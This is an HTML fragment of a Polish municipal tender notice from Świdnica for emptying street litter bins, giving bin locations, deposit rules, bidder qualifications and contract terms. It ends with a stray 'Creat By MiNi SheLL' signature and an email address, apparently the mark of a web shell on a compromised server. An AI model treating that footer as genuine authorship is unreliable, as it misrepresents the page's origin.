252) ul. Marcinkowskiego 4 - Szkoła Podstawowa nr 4 			szt. 2
253) ul. Wodna 5 - Szkoła Podstawowa nr 6				szt. 2
254) ul. Kozara Słobódzkiego - Gimnazjum nr 1				szt. 2
255) ul. Kozara Słobódzkiego - w pobliżu żłobka  			szt. 1
256)  ul. 8-go Maja - Szkoła Muzyczna 				szt. 1
257) ul. Wodna 4							szt. 1
258) skrzyżowanie ul. Mieszka i Wodna - po stronie parkingu targowiska	szt. 1
259) skrzyżowanie ul. Wodnej i Nadbrzeżnej				szt. 1
260) skrzyżowanie ul. Kliczkowska i Kopernika
po stronie dawnego ŚFUP						szt. 1
261) Kopernika - po stronie firmy Gipiura				szt. 1
262) skrzyżowanie ul. Kopernika i Kliczkowska -
po stronie apteki						szt. 1
263) Kopernika 6							szt. 1
264) Kopernika- w pobliżu firmy Wistal					szt. 1
265) Kopernika 15A						szt. 1
266 ) Wałbrzyska 25-27 - koło WODR					szt. 1
267) Wałbrzyska - przy murze Szk. Podstawowej nr 8			szt. 1
268) Plac Kombatantów - w pobliżu parkingu				szt. 2 
Razem                                                                                           391 szt.
2. Wykaz  lokalizacji koszy ulicznych Zamawiającego zamontowanych trwale do podłoża   
                                                                         Ilość koszy,pojemność kosza
1) ul. Pułaskiego 				szt. 11	( poj. 80 l )
2)  Rynek					szt. 18 	( poj. 80 l )
3) ul. Armii Krajowej ( Urząd Miejski )			szt.   2 ( poj. 80 l )
4) ul. Armii Krajowej (Urząd Miejski )			szt.   1  ( poj. 50 l )
5) ul. Kościelna - w pobliżu Kościoła Pokoju		szt.   2 ( poj. 80 l )
6) ul. Grodzka				szt.   6 ( poj. 80 l )
7) ul. Kotlarska 				szt.   8 ( poj. 80 l )
8) Pl. Grunwaldzki				szt.   3 ( poj. 80 l ) 
9) ul. Długa 				szt.  6 ( poj. 80 l )
10) ul. Franciszkańska 			szt.  4 ( poj. 80 l )
11) ul.  Bohaterów Getta			szt.  7 ( poj. 80 l )
12) ul. Komunardów			szt. 12 ( poj. 50 l )
13) ul. Żeromskiego ( między Kotlarską a Pl. Grunwaldzkim )szt. 3 ( poj. 80 l )
14) ul. Chrobrego				szt. 2 ( poj. 80 l )
15) ul. Muzealna 				szt. 4 ( poj. 80 l )
16) ul. Jagiellońska 2			szt. 1 ( poj. 50 l )
17) ul. Konopnickiej - koło postoju koło Taxi		szt. 1 ( poj. 50 l ) 
18) skrzyżowanie Pl. Św. Małgorzaty/1 Maja		szt. 1 ( poj. 50 l )
19)  skrzyżowanie Jagiellońska/Chrobrego		szt. 1 ( poj. 50 l )
20) skrzyżowanie Konopnickiej/Pl. Św. Małgorzaty	szt. 1 ( poj. 50 l )
21) ul. Łukowa 					szt. 7 ( poj. 50 l )
22) ul. Mennicka 					szt. 3 ( poj. 50 l )
23) ul. Księcia Bolko				szt. 5 ( poj. 80 l )  
24) ul. Konopnickiej 4 - koło Ars Medica		szt. 1 ( poj. 60 l )
25) ul. 1 Maja - vis a vis posesji 1 Maja 9		szt. 1 ( poj.80 l )
26)  róg Żeromskiego/Budowlana- koło Zespołu Szkół nr 1	szt. 1 ( poj.60 l )
Razem                                                                    		 szt. 112.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt  6 ustawy Pzp przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 30 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8, 90.51.13.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Rozdział 11  WYMAGANIA DOTYCZĄCE WADIUM:
11.1 Oferta powinna być zabezpieczona wadium w wysokości: 5 600 zł (słownie: pięć tysięcy sześćset złotych).
11.2 Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 14-11-2013 roku  przed godz. 09:00.
11.3 Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych, z tym, że:
a) złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO. S.A  I Oddział w Świdnicy  96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.   
b) złożone w gwarancjach (bankowych, ubezpieczeniowych):
z treści gwarancji winno wynikać bezwarunkowo (na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą) zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Pzp tj. w przypadku gdy Wykonawca:                                                                                               
- odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
c) złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony  za  potwierdzeniem, przed upływem terminu składania ofert.
d/ w przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji/poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art.23 ustawy Pzp.
11.4. Dowód przelewu lub potwierdzenie depozytu (oryginał) należy dołączyć do oferty.
11.5. Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
11.6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana  jako najkorzystniejsza.
11.7  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
11.8 Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.9  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
c) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3,  nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1.1 Wykonawca wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania, tj.
a)  posiada wpis do rejestru działalności regulowanej  prowadzonej przez Prezydenta Miasta Świdnica, o którym mowa w art. 9b ust.4 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach ( Dz.U. z 2012 r. poz. 391 z późn. zm.) w zakresie odpadów o kodzie minimum: 20.03.01 - niesegregowane (mieszane) odpady komunalne.
oraz
b) zezwolenie  na  transport  odpadów komunalnych o kodzie minimum 20.03.01 - niesegregowane 
(mieszane) odpady komunalne,  wydane przez właściwego starostę, o którym mowa w art. 28   ustawy z dnia 27.04.2001 r. o odpadach (t.j. Dz.U. z 2010 r. Nr 185 poz.1243 z późn. zm.) w związku z art. 233 ust. 3 ustawy z dnia 14.12.2012 r. o odpadach (Dz.U. z 2013 r. poz. 21).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.2.1 Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykaże się wykonaniem lub wykonywaniem usług o wartości łącznej nie mniejszej niż  200 000 zł brutto,  w tym jedno zadanie na kwotę minimum 50 000 zł brutto polegających na opróżnianiu koszy.
Opis dla potwierdzenia tego warunku powinien być zawarty w załączniku nr 2 do oferty Wykonawcy ( wzór załącznik C do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujący warunek:
6.1.3.1 dysponować sprzętem w celu realizacji zamówienia.
- pojazd specjalistyczny do transportu odpadów komunalnych o masie całkowitej nie przekraczającej 3,5 tony  - 1 szt.
- 391 szt. koszy ulicznych o pojemności minimum 35 litrów, maksimum 50 litrów które są estetyczne, stabilne, trwałe, odporne na warunki zewnętrzne i akty wandalizmu (w opisie sprzętu podać pojemność oraz materiał z jakiego wykonany jest kosz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujący warunek:
6.1.3.2 dysponować 2 osobami posiadającymi wymagane uprawnienia do kierowania  pojazdem do transportu odpadów komunalnych o masie całkowitej nie przekraczającej 3,5 tony.
6.1.3.3 dysponować osobą odpowiedzialną za realizację usług posiadającą minimum średnie wykształcenie.
6.1.3.4  posiadać średnie roczne zatrudnienie w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie nie niższe niż  6 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.4.1 Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min. 50 000 zł (pięćdziesiąt tysięcy złotych) oraz, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50 000 zł (pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>7.1.2.1 wykaz  wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  usług  w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności  jest  krótszy  -   w tym okresie, polegających na opróżnianiu koszy  o  wartości  łącznej  nie  mniejszej  niż 200 000 zł brutto,  w tym jedno zadanie na kwotę minimum 50 000 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli Wykonawca będzie polegał na zdolności ekonomiczno- finansowej podmiotów trzecich do oferty winien dołączyć oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów (art. 369 k.c.).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.7  Dodatkowo Wykonawca winien do oferty dołączyć: 
- dowód wniesienia wadium (załącznik nr 20 do oferty Wykonawcy),
- pełnomocnictwo do podpisania oferty w przypadku , gdy ofertę podpisuje osoba (osoby nie wskazane w dokumencie rejestrowym) upoważniona do składania oświadczeń woli przez Wykonawcę  (załącznik nr 21 do oferty Wykonawcy),
- pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej ( załącznik nr 22 do oferty  Wykonawcy)
- informację o przynależności do grupy kapitałowej w przypadku gdy Wykonawca należy do grupy kapitałowej - załącznik J do SIWZ (załącznik nr 23 do oferty Wykonawcy)
- kosztorys ofertowy - załącznik K do SIWZ (załącznik nr 24 do oferty Wykonawcy),
- zaparafowany projekt umowy - załącznik L do SIWZ (załącznik nr 25 do oferty Wykonawcy).
-  zdjęcie lub karta katalogowa oferowanego kosza (załącznik nr 26 do oferty Wykonawcy).
Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom - wzór stanowi załącznik  H do SIWZ (załącznik nr 10 do oferty Wykonawcy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19.1 Zamawiający wymaga od Wykonawcy aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach jak umowa, której projekt stanowi załącznik L do SIWZ.
19.2 Zamawiający przewiduje zmiany umowy wprowadzane aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a)  jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),
b) jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
c) z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach. 
19.3. Zamawiającemu przysługuje prawo do natychmiastowego odstąpienia 
od umowy  bez wypowiedzenia  i prawa wykonawcy do odszkodowania w przypadku:
a) gdy zostanie ogłoszona upadłość lub rozwiązanie firmy Wykonawcy,
b) gdy zostanie wydany nakaz zajęcia majątku Wykonawcy,
c) jeżeli Wykonawca nie rozpoczął prac bez uzasadnionych przyczyn, nie kontynuuje ich mimo wezwania Zamawiającego złożonego na piśmie a przerwa w realizacji trwa dłużej niż 3 dni,
d) rażących zaniedbań w realizacji przedmiotu umowy. Przez rażące zaniedbanie należy rozumieć w szczególności sytuację w której wysokość kar umownych z tytułu o którym mowa w § 12 ust. 1 pkt b, c,  d i e  umowy  przekroczy 3 % wartości zamówienia podstawowego brutto,
e) braku uprawnień o których mowa § 4 umowy,
f) braku dokumentów o których mowa w § 10 umowy. 
19.4 Zamawiający w okresie trwania umowy zastrzega sobie prawo ograniczenia zakresu prac (zmniejszenie opróżnianych koszy) w przypadku prowadzenia na drogach prac remontowych lub budowlanych oraz innych okoliczności niezależnych od Zamawiającego.
19.5 W przypadku  ograniczenia zakresu prac o którym mowa w  pkt. 19.4  wynagrodzenie za realizację zadania zostanie obniżone proporcjonalnie do zakresu ograniczonych prac. W takiej sytuacji  Wykonawcy nie przysługuje roszczenie odszkodowawcze.
19.6 Termin płatności: Zamawiający zobowiązuje się do uregulowania należności na rzecz Wykonawcy w terminie 30 dni od daty otrzymania faktury.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2013 godzina 09:00, miejsce: Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com